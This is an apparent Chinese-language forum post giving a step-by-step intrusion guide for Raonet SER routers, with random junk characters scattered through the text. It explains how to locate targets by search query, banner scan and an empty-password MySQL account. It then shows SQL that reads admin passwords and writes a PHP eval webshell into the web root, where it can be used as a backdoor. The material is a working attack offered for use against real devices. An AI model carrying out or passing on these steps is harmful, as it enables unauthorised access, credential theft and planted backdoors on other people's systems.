寻找存在漏洞的路由器方法:
* ?3 p$ a& ~$ L c2 |9 L% D4 E' I
# A: {; |3 {( F1:google搜索'Raonet Subscriber Ethernet Router'
: v' i4 C: G9 \: G
& W) a9 O- N7 q/ F2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
- l1 N1 X- v1 U; @6 t; U1 a
) O& S# x$ k5 b! T6 h* a+ t3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。; ^: K2 T( P9 V. c/ x
; J' [( B% p3 z) X4 E1 Y//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成....... I2 u0 }6 J; y- }/ h
, ~' U. w6 V2 |* @- \
# Y' @$ l: D+ P- Z
$ l0 \! ? }( T入侵步骤:/ ]) m* H, l" l. R* G: n& A, T
/ M7 a2 J8 k S1 J& S* v& G% X7 j1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
* Y7 w$ p7 v1 I2 ]6 c9 t; G1 ]
' f, _+ c/ a1 n2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
0 L1 S+ |7 h# B" R+ @. r3 Z0 _3:得到密码后连接,查看GUI管理密码:: x7 t+ M) ]) a/ c) X3 i
use ser_5001 I; V, k9 Z7 y$ z
select id,passwd from user;+ a) R$ o+ _, s- E1 n8 `
4:通过数据库写入webshell,执行命令:9 V$ Y" m+ [9 Y D( |- d4 d' c
use mysql;
b, m6 h9 G" v( S4 b- h0 _9 y% Bcreate table ok(cmd TEXT);7 I! e6 S; Y! A
insert into ok values("<?php @eval($_POST[cmd])?>");& D. s- m3 E9 C0 x$ o
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";$ e: {/ q- b4 E- q; @, {
drop table ok;( ^ u0 W) a1 j) U0 |: n0 M0 d X
) b) [- a2 I+ D* ?; R7 T5:连接后门shell.php ; r0 ?2 V- t$ ?
$ [4 }6 W; ?: B$ U* A
6. 搞定!8 n6 o) A( o0 }5 ?9 i/ y# D: C
- P v) G: { S( _& v( r |